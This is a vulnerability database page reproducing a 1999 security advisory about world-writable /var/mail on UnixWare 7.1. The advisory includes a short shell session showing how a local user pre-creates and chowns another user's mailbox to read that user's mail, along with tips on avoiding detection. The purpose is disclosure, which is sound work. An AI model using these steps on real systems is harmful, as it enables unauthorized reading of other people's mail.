Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

unixware7.mail.txt

🗓️ 06 Dec 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

UnixWare 7.1 allows users to read/modify others' mail due to permissions issues in /var/mail.

Code
`Greetings,  
  
OVERVIEW  
Any user can read/modify others' mail.  
  
BACKGROUND  
Only UnixWare 7.1 was tested.  
  
DETAILS  
Imagine my suprise when I saw that /var/mail was mode 777. As such, any  
user may create a file called /var/mail/<username> with a mode readable by  
him and trap all incoming mail. Afraid of getting caught? chown the file  
to <username> (see my advisory on this subject), leaving it still  
world-readable, and no one will ever know who did it.   
  
  
All of this assumes, of course, that the user has not recieved any mail  
yet. If you keep track of your /etc/passwd file, you can monitor for new  
entries and create the files as needed.  
  
This permissions problem obviously opens the door for all sorts of  
problems with symlinks and such. I would imagine that some mail delivery  
programs which aren't as smart as sendmail will follow symlinks in  
/var/mail.  
  
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG  
LIE:  
  
bash-2.02$ cat /usr/bin/mail  
#!/bin/sh  
cat > /dev/null  
exit 0  
bash-2.02$   
  
;)  
  
EXPLOIT  
  
bash-2.02$ id  
uid=3D106(xnec) gid=3D1(other)  
bash-2.02$ pwd  
/var/mail  
bash-2.02$ touch btellier  
bash-2.02$ chown btellier btellier  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier  
  
Now wait for btellier to get some mail...  
  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier  
bash-2.02$ cat btellier  
=46rom root Sat Dec 4 07:55:29 1999  
Return-Path: root  
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842  
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
From: root@localhost  
Message-Id: <199912041355.HAA04842@localhost>  
Status:   
  
X-Status:   
  
X-SCO-PAD: XXXXXX  
X-SCO-UID: 1  
Content-Length: 52  
  
your ueber-secure password on 0wned.com is a@f9;se0  
bash-2.02$   
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
unixware 7.1mail permissionsunauthorized accessfile ownershipsecurity vulnerabilitymail delivery issues
28